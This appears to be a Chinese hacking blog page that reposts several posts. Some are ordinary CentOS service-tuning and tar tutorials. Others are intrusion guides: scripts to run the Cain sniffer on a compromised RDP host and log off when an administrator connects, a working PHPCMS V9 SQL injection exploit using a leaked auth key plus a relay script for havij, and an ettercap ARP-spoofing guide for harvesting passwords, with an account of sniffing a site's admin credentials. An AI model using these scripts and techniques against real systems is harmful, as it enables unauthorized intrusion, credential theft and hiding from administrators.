ping -n 1 -l 1 61.135.169.105
IF ERRORLEVEL 1 GOTO kill
IF ERRORLEVEL 0 GOTO start

:start
TaskList|Findstr /i "cain.exe"
If ErrorLevel 1 (
start cain.exe
)
goto top

:kill
TaskList|Findstr /i "cain.exe"
If ErrorLevel 0 (
taskkill /f -im cain.exe
ping 127.0.1 -n 10 -l 1
 )
goto top

大家常用的工具是cain,用法大家都会了。但是cain在嗅探过程中,如果遇到流量较大的目标机,往往会把装cain的主机搞死,从而引起管理员的注意。像有的时候,嗅了一阵后,就会把3389搞死。我也没有更好的办法,只能让cain嗅一段时间后停止,再重新开始。如果每次都是手工去停止cain,有时候时间掌握的不及时,3389已经死掉了。其实解决这个问题很简单,一个简单的批处理脚本就可以了。脚本内容如下:
 

ping 127.0.0.1 -n 5000>nul
taskkill /F /PID 4144


上边批处理脚本中,5000是秒数,用来控制cain的嗅探时间。4144是cain的进程数,可以自己用tasklist查一下就知道了。这样一来,你可以放心在嗅探这段时间内去做别的事了。

再来呢,用cain嗅探一般会在3389上,这时候如果碰到管理员登陆3389也不太好办,我的好友Netpatch写过一个终端监视脚本,一旦发现有两人同时登陆终端的话就注销自己。脚本内容如下:
 

on error resume next
set arg=wscript.arguments
If arg.count=0 then
wscript.echo “use:// cscript.exe FS.vbs port”
sleep 1000
wscript.quit
End If
Tport=arg(0)
Runs=false
While runs=false
Dim oShell,oExec,strOut,oRegExp,Matches,Match,Num,Tport
Set oShell = WScript.CreateObject(”WScript.Shell”)
Set oExec = oShell.Exec(”netstat -an”)
Set oRegExp = new RegExp
oRegExp.Pattern = “TCP[\s]+[\d\.]+:”&Tport&”[\s]+[\d\.]+:[\d]+[\s]+ESTABLISHED”
oRegExp.IgnoreCase = True
oRegExp.Global = True
Do While Not oExec.StdOut.AtEndOfStream
strOut = strOut & oExec.StdOut.ReadLine() & Chr(13) & Chr(10)
Loop
Set Matches = oRegExp.Execute(strOut)
Num = 0
For Each Match In Matches
Num = Num + 1
Next
if num > 1 then
Runs=true
oShell.run “logoff”
end if
Set Matches = Nothing
Set oRegExp = Nothing
Set oExec = Nothing
Set oShell = Nothing
wend


用此脚本,登陆终端时打开就可以了,这也是一个比较好的隐藏自己的办法。

centos开机启动服务优化笔记

发布时间:June 2, 2015 // 分类:工作日志,运维工作,linux,转帖文章 // No Comments

默认开机启动服务列表:

服务名称 功能 默认 建议 备注说明
NetworkManager 用于自动连接网络,常用在Laptop上 开启 关闭 对服务器无用  服务器一般固定配置网络,不会自动获取ip等
abrt-ccpp   开启 自定 对服务器无用
abrt-oops   开启 自定 对服务器无用
abrtd   开启 自定 对服务器无用
acpid 电源的开关等检测管理,常用在Laptop上 开启 自定 对服务器无用
atd 在指定时间执行命令 开启 关闭 如果用crond,则可关闭它
auditd 审核守护进程 开启 开启 如果用selinux,需要开启它
autofs 文件系统自动加载和卸载 开启 自定 只在需要时开启它,可以关闭
avahi-daemon 本地网络服务查找 开启 关闭 对服务器无用
avahi-dnsconfd avahi DNS 关闭 关闭 对服务器无用
bluetooth 蓝牙无线通讯 开启 关闭 对服务器无用
dund 蓝牙相关 开启 关闭 对服务器无用
hidd 蓝牙相关 开启 关闭 对服务器无用
pand 蓝牙相关 关闭 关闭  
conman 控制台管理 关闭 关闭 无用
certmonger   关闭 关闭  
cpuspeed 调节cpu速度用来省电,常用在Laptop上 开启 关闭 对服务器无用
crond 计划任务管理 开启 开启 常用,开启
cups 通用unix打印服务 开启 关闭 对服务器无用
dnsmasq dns cache 关闭 关闭 DNS缓存服务,无用
firstboot 系统安装后初始设定 关闭 关闭  
fcoe Open-FCoE  initiator    以太网光纤通信 开启 关闭 除非服务器光纤直连,否则无用
gpm 控制台下的鼠标支持 开启 开启  
haldaemon 硬件信息收集服务 开启 开启  
ibmasm ibm硬件管理 关闭 关闭  
ip6tables ipv6防火墙 开启 关闭 用到ipv6网络的就用,一般关闭
iptables ipv4防火墙 开启 开启 ipv4防火墙服务
irda 红外线通信 关闭 关闭 无用
irqbalance cpu负载均衡 开启 自定 多核cup需要
iscsi 网络存储相关 开启 关闭  
iscsid 网络存储相关 开启 关闭  
kdump 硬件变动检测 关闭 关闭 服务器无用
kudzu 硬件变动检测 低版本的系统中 关闭 关闭 对服务器无用
livesys 安装系统相关服务 开启 关闭  
livesys-late 安装系统相关服务 开启 关闭  
lvm2-monitor lvm监视 开启 自定 如果使用LVM逻辑卷管理就开启
blk-availability lvm2相关 开启 自定 如果用lvm,则建议开启,否则不需要
mcstrans 在开启selinux时用于检查context 开启 关闭  
matahari-broker   关闭 关闭 此服务不清楚,我关闭
matahari-host   关闭 关闭 此服务不清楚,我关闭
matahari-network   关闭 关闭 此服务不清楚,我关闭
matahari-service   关闭 关闭 此服务不清楚,我关闭
matahari-sysconfig   关闭 关闭 此服务不清楚,我关闭
mdmonitor 软raid监视 开启 自定  使用软raid的服务器开启
mdmpd 软raid管理 关闭 关闭  
multipathd   关闭 关闭  
messagebus 负责在各个系统进程之间传递消息 开启 开启 如停用,haldaemon启动会失败
microcode_ctl cpu微码管理升级 开启 关闭  
netconsole   关闭 关闭  
netfs 系统启动时自动挂载网络文件系统 开启 关闭 如果使用nfs服务,就开启
network 系统启动时激活所有网络接口 开启 开启 网络基础服务,必需!
netplugd 网线热插拔监视 关闭 关闭  
nfs 网络文件系统 关闭 关闭 nfs文件服务,用到就开启
nfslock nfs相关 开启 关闭 nfs相关服务,用到就开启
nscd name cache,应该与DNS相关 关闭 关闭  
ntpd 自动对时工具 关闭 自定 网络对时服务,用到就开启
ntpdate 自动对时工具 关闭 关闭  
oddjobd 与D-BUS相关 关闭 关闭  
portreserve RPC 服务相关 开启 自定 可以关闭
pcscd pc/sc smart card daemon 开启  关闭  
portmap 使用NFS、NIS时的port map 开启 关闭  
postfix 替代sendmail的邮件服务器 开启 自定 如果无邮件服务,可关闭
psacct 负荷检测 关闭 关闭 可以关闭
qpidd 消息通信 开启 开启  
quota_nld   关闭 关闭 可以关闭
rdisc 自动检测路由器 关闭 关闭  
rawdevices raw设备支持 开启 开启  
readahead_early 提前预读相关 开启 开启  
readahead_later   关闭 关闭  
restorecond selinux相关 关闭 关闭 如果开启了selinux,就需开启
rpcbind   开启 开启 关键的基础服务,nfs服务和桌面环境都依赖此服务!相当于CentOS 5.x里面的portmap服务。
rpcgssd NFS相关 开启 关闭 NFS相关服务,可选
rpcidmapd RPC name to UID/GID mapper 开启 关闭 NFS相关服务,可选
rpcsvcgssd NFS相关 关闭 关闭 NFS相关服务,可选
rsyslog 提供系统的登录档案记录 开启 开启 系统日志关键服务,必需!
syslog 系统日志相关 开启 开启  
saslauthd sasl认证服务相关 关闭 关闭  
smartd 硬盘自动检测守护进程 关闭 关闭  
spice-vdagentd   开启 开启  
sshd ssh服务端,可提供安全的shell登录 开启 开启 SSH远程登录服务,必需!
sssd   关闭 关闭  
sendmail 邮件服务 开启 自定义  
sysstat   开启 开启 一组系统监控工具的服务,常用
tcsd   关闭 关闭  
udev-post 设备管理系统 开启 开启  
wdaemon   关闭 关闭  
wpa_supplicant 无线认证相关 关闭 关闭  
xfs x windows相关 开启 关闭  
ypbind network information service客户端 关闭 关闭  
yum-updatesd yum自动升级 开启 关闭  

查看当前开机启动服务列表

chkconfig --list | grep '3:on' | awk '{print $1}'

我的优化项目

chkconfig bluetooth off
chkconfig auditd off
chkconfig cups off
chkconfig yum-updatesd off
chkconfig smartd off
chkconfig sendmail off
chkconfig ip6tables off
chkconfig atd off
chkconfig iscsi off
chkconfig iscsid off
chkconfig microcode_ctl off

需要因机器和环境而异,仅做记录备忘。

推荐阅读

《生产服务器环境最小化安装后 Centos 6.5优化配置》http://www.lvtao.net/server/centos-server-setup.html

linux tar压缩排除某个文件夹或者某种类型

发布时间:May 19, 2015 // 分类:工作日志,代码学习,linux,转帖文章 // No Comments

一般直接用tar命令打包很简单,直接使用 tar -zcvf test.tar.gz test 即可。

在很多时候,我们要对某一个目录打包,而这个目录下有几十个子目录和子文件,我们需要在打包的时候排除其中1、2个目录或文件。

这时候我们在用tar命令打包的时候,增加参数 --exclude 就能达到目的。

例如:

我们以tomcat 为例,打包的时候我们要排除 tomcat/logs 目录,命令如下:

tar -zcvf tomcat.tar.gz --exclude=tomcat/logs tomcat

如果要排除多个目录,增加 --exclude 即可,如下命令排除logs和libs两个目录及文件xiaoshan.txt:

tar -zcvf tomcat.tar.gz --exclude=tomcat/logs --exclude=tomcat/libs --exclude=tomcat/xiaoshan.txt tomcat

这里要说一下注意事项:

大家都知道linux在使用tab键的时候会对目录名称自动补全,这很方便,大家也比较常用。

如我们输入 tomcat/lo 的时候按tab键,命令行会自动生成 tomcat/logs/ ,对于目录,最后会多一个 “/”

这里大家要注意的时候,在我们使用tar 的--exclude 命令排除打包的时候,不能加“/”,否则还是会把logs目录以及其下的文件打包进去。

错误写法:

tar -zcvf tomcat.tar.gz --exclude=tomcat/logs/ --exclude=tomcat/libs/ tomcat

正确写法:

tar -zcvf tomcat.tar.gz --exclude=tomcat/logs --exclude=tomcat/libs tomcat

也可以排除指定的文件类型

tar -cvf test.tgz test/ --exclude *.jpg

这样,就会把jpg后缀的文件都排除了,包括子目录!如果是多个后缀类型需要被排除可以在后面添加,无限制

tar -cvf test.tgz test/ --exclude *.txt --exclude *.jpg

以上是匹配排除某个文件类型后缀,也可以直接指定文件名

tar -cvf test.tgz test/ --exclude a.txt

或者指定目录,也可以排除目录与文件一起混合使用

tar -cvf test.tgz test/ --exclude dir1 --exclude a.log --exclude *.jpg

 

PHPCMS V9 一个为所欲为的漏洞

发布时间:May 19, 2015 // 分类:PHP,代码学习,转帖文章 // 1 Comment

phpcms phpsso_auth_key泄露: WooYun: PHPCMS V9 一个为所欲为的漏洞 

http://www.2cto.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=662dCAZSAwgFUlUJBAxbVQJXVghTWVQHVFMEV1MRX11cBFMKBFMGHkUROlhBTVFuW1FJBAUVBwIXRlgeERUHQVlIUVJAA0lRXABSQEwNXAhZVl5V

1.png

phpsso_auth_key: 0tagvqnxuq1x8x4jvaziib7yx4e9ibnl

由于GPC off,于是就可以sql注入了。


使用authkey加密payload:

<?php

function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0) {

    $key_length = 4;

    $key = md5($key != '' ? $key : pc_base::load_config('system', 'auth_key'));

    $fixedkey = md5($key);

    $egiskeys = md5(substr($fixedkey, 16, 16));

    $runtokey = $key_length ? ($operation == 'ENCODE' ? substr(md5(microtime(true)), -$key_length) : substr($string, 0, $key_length)) : '';

    $keys = md5(substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));

    $string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$egiskeys), 0, 16) . $string : base64_decode(substr($string, $key_length));

    $i = 0; $result = '';
    $string_length = strlen($string);
    for ($i = 0; $i < $string_length; $i++){
            $result .= chr(ord($string{$i}) ^ ord($keys{$i % 32}));
    }

    if($operation == 'ENCODE') {

            return $runtokey . str_replace('=', '', base64_encode($result));

    } else {

            if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$egiskeys), 0, 16)) {

                    return substr($result, 26);

            } else {

                    return '';

            }
    }
}

echo sys_auth("action=synlogin&uid=' and updatexml(1,concat('~',user()),1)#", 'ENCODE', '0tagvqnxuq1x8x4jvaziib7yx4e9ibnl');
http://www.2cto.com/api.php?op=phpsso&code=6f56BQgIUVQDVAkGUwEFCgwDAwNSAVBdA1UHD1RSURFZDlgIS0EPCFwDUFhFFl1dCBMWVlkHE0xDUFJDBktfCRhQGlZXVgIFR0weSERPQUpQRh4eHk8CEBA

2.png

看到有人说是phpcms authkey 无法注入。于是噌噌噌的搞了一个中转的脚本

<?php
set_time_limit(0);
$wang_url = 'http://www.0day5.com';

$auth_key = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxx';

$str = "uid=1".stripslashes($_GET['id']);
$encode = sys_auth($str, 'ENCODE', $auth_key);
$content = file_get_contents($wang_url."/phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1&data=".$encode);
echo $content;
function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0) {
         $key_length = 4;
         $key = md5($key);
         $fixedkey = hash('md5', $key);
         $egiskeys = md5(substr($fixedkey, 16, 16));
         $runtokey = $key_length ? ($operation == 'ENCODE' ? substr(hash('md5', microtime(true)), -$key_length) : substr($string, 0, $key_length)) : '';
         $keys = hash('md5', substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));
         $string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$egiskeys), 0, 16) . $string : base64_decode(substr($string, $key_length));
         $i = 0; $result = '';
         $string_length = strlen($string);
         for ($i = 0; $i < $string_length; $i++){
                   $result .= chr(ord($string{$i}) ^ ord($keys{$i % 32}));
         }
         if($operation == 'ENCODE') {
                   return $runtokey . str_replace('=', '', base64_encode($result));
         } else {
                   if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$egiskeys), 0, 16)) {
                            return substr($result, 26);
                   } else {
                            return '';
                   }
         }
}
?>

使用的办法就是填写目标的www还有key。然后丢到havij里面跑就好了

centos下面ettercap的安装以及使用

发布时间:May 12, 2015 // 分类:工作日志,linux,转帖文章 // No Comments

1、下载与安装EPEL的RPM包。
 

rpm -ivh http://dl.fedoraproject.org/pub/epel/5/i386/epel-release-5-4.noarch.rpm
rpm -ivh http://dl.fedoraproject.org/pub/epel/6/i386/epel-release-6-8.noarch.rpm

2、 安装ettercap

yum -y install ettercap

开始嗅探

开启转发(可能不需要)

echo 1 > /proc/sys/net/ipv4/ip_forward

嗅探

ettercap -T -i eth0 -M arp:remote /192.168.1.1/ /192.168.1.41/80 -m /var/tmp/log.txt
ettercap -T -M arp /目标ip/80 /网关/ -w /tmp/log.txt
ettercap -i eth0 -Tq -M arp:remote /// ///

ettercap -T -M arp /192.168.1.41//80 /192.168.1.1//

嗅探时间可能会挺长可以后台运行

nohup ettercap -T -M arp /目标ip/80 /网关/ -m /tmp/log.txt

保留完整的数据包
ettercap -T -i eth0 -M arp:remote /192.168.1.1/ /192.168.1.41/ -L /var/cache/yum/sniffed_data

然后使用etterlog来把数据进行转换

常用的命令为:

etterlog -A sniffed_data.ecp >1.txt
即将ettercap产生的log数据转成可显示的数据保存在1.txt中。

etterlog -B sniffed_data.ecp >1.data
将数据原封不动的转存成文件。

如果字段不是在里面。是可以修改配置信息的
/usr/share/ettercap/etter.fields

 

关于ettercap
嗅探:它有5种工作模式
-a --arpsniff 基于arp的欺骗,分3小种:arpbased,smartcarp和publicarp
-s --sniff 属于IPBASED,目标可以是任何主机
-m --macsniff 属于MACBASED
需要说明的是-s -m两选项带来的是传统嗅探模式,分别基于IP地址和MAC地址.也就是说它们必需先把网卡置于混杂,然后才可以正常工作。所以在交换环境下,这两项会完全失效,-a选项是基于ARP欺骗的,是一种中间人攻击模型。实质是利用了ARP协议的漏洞,攻击者分别欺骗了A和B机。让A机把数据传给嗅探者,然后再由嗅探机器把数据转发给B机,A和B却没有意识到数据包的中转过程,这样我们就可以劫获数据甚至修改数据包.

下面分别介绍五种用法:
1:ettercap -Nza ip1 ip2 mac1 mac2 (arpbased) 劫获IP1与IP2间的数据.缺省状态下只接收TCP数据包

2: ettercap -Na ip mac (smartcarp) 劫获此ip与外部所有通讯数据,这种方式比较剧烈,启动时采用的是ARP风暴,很容易被发现.如果别人在

用TCPDUMP监听,就会看见攻击者发出的无数的ARP请求,再傻的管理员都明白什么事情发生了.不过由于修改了指定主机的ARP表中关于被监听主机的MAC地址,还修改了被监听主机中的那些指定主机的MAC地址,处在完全的中间人工作状态,这时候你可以作的事情多些,比如更改数据包,截取SSH口令.

3:ettercap -Nza ip mac (publicarp) 同上,不同点在于发送ARP请求的方式,上面采用的是ARP广播,这里只是对特定主机发送ARP请求.这样,不易引起管理员的怀疑.不过也带来了问题,被监听者自己也会收到这个以广播方式发送的ARP响应包,于是便会弹出"检测到IP地址于硬件地址冲突"之类的警告.不过不会影响目标主机正常通信,还有一点就是发往被监听主机的数据包会送给监听者,而监听者发出的数据包却被直接送往真正的目的主机,没有经过监听者的主机.所以我们只能截取不完全的通信内容.

4:ettercap -Nzs IP:80 (ipbased sniffing) 基于IP地址的嗅探。这里仅劫获目标机器HTTP消息,你也可以指定其他端口,比如23 。如果没有指定,所有都会被截取

5:ettercap -zm mac1 mac 2 (macbased) 基于MAC的嗅探.只要输入MAC地址
需要说明的是,4,5两种方式只适合于共享网络,在交换网络下一概无效.MAC地址的获取很简单,直接在终端输入“ettercap -l"就会列出所有在线主机。或者你先PING一下某个IP,不管有没有回应(没有回应可能是对方开了防火墙),再用ARP命令就可以获取其MAC地址。如果无法获取,则此IP不存在 ,这也是探测防火墙后的主机是否在线的一个好方法。

包过滤:由于网络流量实在很大,当你面对大量记录数据时,你可能会感到手足无措,你想找到自己需要的数据无疑是一项艰巨的工作,这时侯,我们可以通过—F 选项加载自己的过滤规则,这样,很多无用的数据就会被忽略,删节。和注射字符一样,我们进行包过滤时有必要的话也要注意到正确的TCP序列号和确认序列号等因素。一旦你加载了自己的过滤链,你就可以有目的的得到自己最需要的数据了。一条过滤规则看起来就象汇编程序一样,当然,还是有差距的,用列阵形容可能更确切些。一条过滤规则大概如下:《协议,源端口,目标端口,承载数据一个空的搜索字符串总可以成立,比如端口如果没有指定,所有的都会被记录下来。只要那些规则匹配,你的过滤链就可以工作了.

例如有如下数据流
packet 1: "var1=123&var2=400"
packet 2: "var1=124&var2=420"
packet 3: "var1=125&var2=460"
packet 4: "var1=126&var2=540"
packet 5: "var1=127&var2=700
......
......
我们可以写如下规则
Search: "var1=[3*]"
Replace: "var1=000"
被过滤后的流就会如下
packet 1: "var1=000&var2=400"
packet 2: "var1=000&var2=420"
packet 3: "var1=000&var2=460"
packet 4: "var1=000&var2=540"
packet 5: "var1=000&var2=700"
如果“var1”后面没有被指定,默认则“var1=000”
最后是关于ssh的嗅探:
由于传输数据被加密,我们必需自己掌握密钥,具体实现方法如下:我们先截取服务器的明码密钥,保存在一边.自己再生成另一明码密钥,用来加密本机与客户机通讯数据,收到客户机数据后,自然可以解密,在用服务器明码密钥加密,发送给服务器,如此一来,可以偷天换柱.

三:工作参数:
下面列出它的主要选项,虽然它本身有28个,不过限于篇幅,下面只列出一些常用的:
-N --simple 非交互方式,很常用的
-z --silent 静模式(启动时不是发送ARP风暴)
-O --passive 被动模式嗅探
-b --broadping 广播PING ,替代了ARPPING
-S --spoof 用IP1这地址发送ARP请求获取其他机器信息
-H --hosts 嗅探的目标主机的IP,可以是很多台
-n --netmask 扫描由输入子网掩码确定的子网
-v --version 检查最新版本
-h --help 帮助文档
组合选项 (一般和N绑定一齐执行)
-u --udp 嗅探UDP数据,缺省是TCP
-p --plugin 运行指定名字的插件
-l --list 列出所有在线主机ip和mac.实质就是发送255个ARP请求,等待回音,如果你的子网掩码是255.255.0.0,就会发送255*255个请求,就是ARP风暴吧!

-C --colletc 仅搜集用户名和对应密码 Eg:ettetcap -NCzs IP:port 它规则不是很严格,所以你IP或PORT不填也没有关系
-c --check 检察网络里有没其他机器正在嗅探
-x --hexview 用16进制表达数据,这样,如果你想自己创建一个包的话会比较方便.比如建个文件写上"\x01\x02\x00\x00\xFF\xFF\x00\ x02here 

the pass".注意:ettercap不仅可以嗅探包,也可以创建包的.所以你可以更改穿过你机器的任何一段数据
-L --logtofile 记录所有数据到指定位置
-k --newcert 创建一个新的CERT文件,用以进行HTTPS攻击
-F --filter 从指定文件列加载过滤规则
-f --fingerprint 指定主机的OS判别,采用的是nmap的数据库,所以准确性得到保障,不过也有无法辨别的时候.
-t --linktype 判断自己处在什么样的网络环境中,交换或是HUB

6 数据筛选

由于这个网站的数据特别大,一小时的数据有1g多,好吧,grep筛选出

抓包分析出目标站前台提交的密码的字段 pwd

cat /tmp/log.txt | grep –a “&pwd=” | more

好吧,每隔几小时我就看一次,过了半天,嗅到后台密码了,同时也嗅到后台地址了

www.xxx.com/xxx/login.php]http://www.xxx.com/xxx/login.php]www.xxx.com/xxx/login.php

 

分类
最新文章
最近回复
  • 没穿底裤: 最近发现的新版本可以装在LINUX了。但是API有点变化
  • 没穿底裤: 暂时好像没有看到这个功能.
  • 没穿底裤: 这个只是一个分析,并不是使用方法哟
  • 没穿底裤: 抱歉,很久没有打理了。会不会你使用的是12版本。目前还没有遇到过这种情况
  • bao song: http://0cx.cc/php_decode_shell.jspx 这个怎么用,代码提示...